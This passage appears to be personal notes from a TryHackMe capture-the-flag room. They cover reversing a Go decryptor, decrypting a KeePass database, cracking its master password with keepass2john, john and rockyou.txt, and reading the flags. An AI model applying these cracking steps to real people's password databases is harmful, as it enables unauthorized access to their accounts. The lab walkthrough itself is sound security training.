                    /* WARNING: Subroutine does not return */
    runtime.panicIndex();
  }
  if (os.Args._8_8_ < 3) {
                    /* WARNING: Subroutine does not return */
    runtime.panicIndex();
  }
  if (3 < os.Args._8_8_) {
    main.decryptFile();
    return;
  }
                    /* WARNING: Subroutine does not return */
  runtime.panicIndex();
}

so 4 args


'Database.carp' 'Database.kbxd' and key  F+lRG6As2e1qBd3/7dPTvcmcluUEjMwkq22K6zBIcP8ZF1LuJLsarUKgmhw+P8oZvBSJUXGiGVcRuHxbnQY8Tg==

┌──(witty㉿kali)-[~/Downloads]
└─$ cat perm_decrypt.py 
from itertools import permutations
import subprocess

arguments = ['Database.carp', 'Database.kbxd', 'F+lRG6As2e1qBd3/7dPTvcmcluUEjMwkq22K6zBIcP8ZF1LuJLsarUKgmhw+P8oZvBSJUXGiGVcRuHxbnQY8Tg==']
perm = permutations(arguments[1:])

for i in perm:
    command = ['./decrypt_linux_amd64'] + list(i) + [arguments[0]]
    output = subprocess.check_output(command, text=True)
    print(output.strip())


┌──(witty㉿kali)-[~/Downloads]
└─$ file Database.kbxd.decrypt 
Database.kbxd.decrypt: executable, regular file, no read permission

┌──(witty㉿kali)-[~/Downloads]
└─$ chmod 777 Database.kbxd.decrypt
                                                                                                                     
┌──(witty㉿kali)-[~/Downloads]
└─$ file Database.kbxd.decrypt     
Database.kbxd.decrypt: Keepass password database 2.x KDBX

Command 'kpcli' not found, but can be installed with:
sudo apt install kpcli

┌──(witty㉿kali)-[~/Downloads]
└─$ kpcli

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> help
  attach -- Manage attachments: attach <path to entry|entry number>
autosave -- Autosave functionality
      cd -- Change directory (path to a group)
      cl -- Change directory and list entries (cd+ls)
   clone -- Clone an entry: clone <path to entry> <path to new entry>
   close -- Close the currently opened database
     cls -- Clear screen ("clear" command also works)
    copy -- Copy an entry: copy <path to entry> <path to new entry>
    edit -- Edit an entry: edit <path to entry|entry number>
  export -- Export entries to a new KeePass DB (export <file.kdb> [<file.key>])
    find -- Finds entries by Title
     get -- Get a value: get <entry path|entry number> <field>
    help -- Print helpful information
 history -- Prints the command history
   icons -- Change group or entry icons in the database
  import -- Import a password database (import <file> <path> [<file.key>])
      ls -- Lists items in the pwd or specified paths ("dir" also works)
   mkdir -- Create a new group (mkdir <group_name>)
      mv -- Move an item: mv <path to a group|or entries> <path to group>
     new -- Create a new entry: new <optional path&|title>
    open -- Open a KeePass database file (open <file.kdb> [<file.key>])
     otp -- Show one-time password: otp <entry path|number>
  passwd -- Change the opened database's password
   purge -- Purges entries in a given group based on criteria.
    pwck -- Check password quality: pwck <entry|group>
     pwd -- Print the current working directory
    quit -- Quit this program (EOF and exit also work)
  rename -- Rename a group: rename <path to group>
      rm -- Remove an entry: rm <path to entry|entry number>
   rmdir -- Delete a group (rmdir <group_name>)
    save -- Save the database to disk
  saveas -- Save to a specific filename (saveas <file.kdb> [<file.key>])
     set -- Set a value: get <entry path|entry number> <field> <val>
    show -- Show an entry: show [-f] [-a] <entry path|entry number>
   stats -- Prints statistics about the open KeePass file
     ver -- Print the version of this program
    vers -- Same as "ver -v"
      xo -- Copy one-time password to clipboard: xo <entry path|number>
      xp -- Copy password to clipboard: xp <entry path|number>
     xpx -- Copy password to clipboard, with auto-clear: xpx <entry path|number>
      xu -- Copy username to clipboard: xu <entry path|number>
      xw -- Copy URL (www) to clipboard: xw <entry path|number>
      xx -- Clear the clipboard: xx

Type "help <command>" for more detailed help on a command.
kpcli:/> 

kpcli:/> open Database.kbxd.decrypt
Provide the master password: *************************
Error opening file: Couldn't load the file Database.kbxd.decrypt

Error(s) from File::KeePass:
Missing pass

kpcli:/> exit
Please consider supporting kpcli development by sponsoring its author:
https://github.com/sponsors/hightowe

┌──(witty㉿kali)-[~/Downloads]
└─$ keepass2john Database.kbxd.decrypt > master_hash

──(witty㉿kali)-[~/Downloads]
└─$ cat master_hash 
Database.kbxd.decrypt:$keepass$*2*60000*0*f7f7a5fe819d52f93c048512f1660ad056d210a2156441f527cfed0aa7d6de7c*033411cd0a2f143a9380ffba621535f8194cd5d9adaea25d40070fb4e9dcddba*ca5f1d64383fe0bafe20943431ba4d66*4de8d6395909815bfff78b55e23e49a2424bf4f5c8a064909c012e18da799e64*d0f87830eecb77648b44353cb03f65c00bb1cf0c49caff97e2cc06769b44e5ac

┌──(witty㉿kali)-[~/Downloads]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt master_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
antonella        (Database.kbxd.decrypt)     
1g 0:00:00:39 DONE (2023-07-11 16:31) 0.02512g/s 94.87p/s 94.87c/s 94.87C/s tyson1..happydays
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(witty㉿kali)-[~/Downloads]
└─$ kpcli                                                       

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> open Database.kbxd.decrypt
Provide the master password: *************************
kpcli:/> ls
=== Groups ===
Database/
kpcli:/> ls Database/
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
=== Entries ===
0. THM                                                                    
kpcli:/> show Database/THM -f

 Path: /Database/
Title: THM
Uname: root
 Pass: THM{You_Found_TheFLag_Well_Done!}
  URL: 
Notes: 

What is flag 1?

THM{So_Far_So_Good_So_What}

What is flag 2?

![[Pasted image 20230711134902.png]]

THM{You_Found_TheFLag_Well_Done!}

[[Sea Surfer]]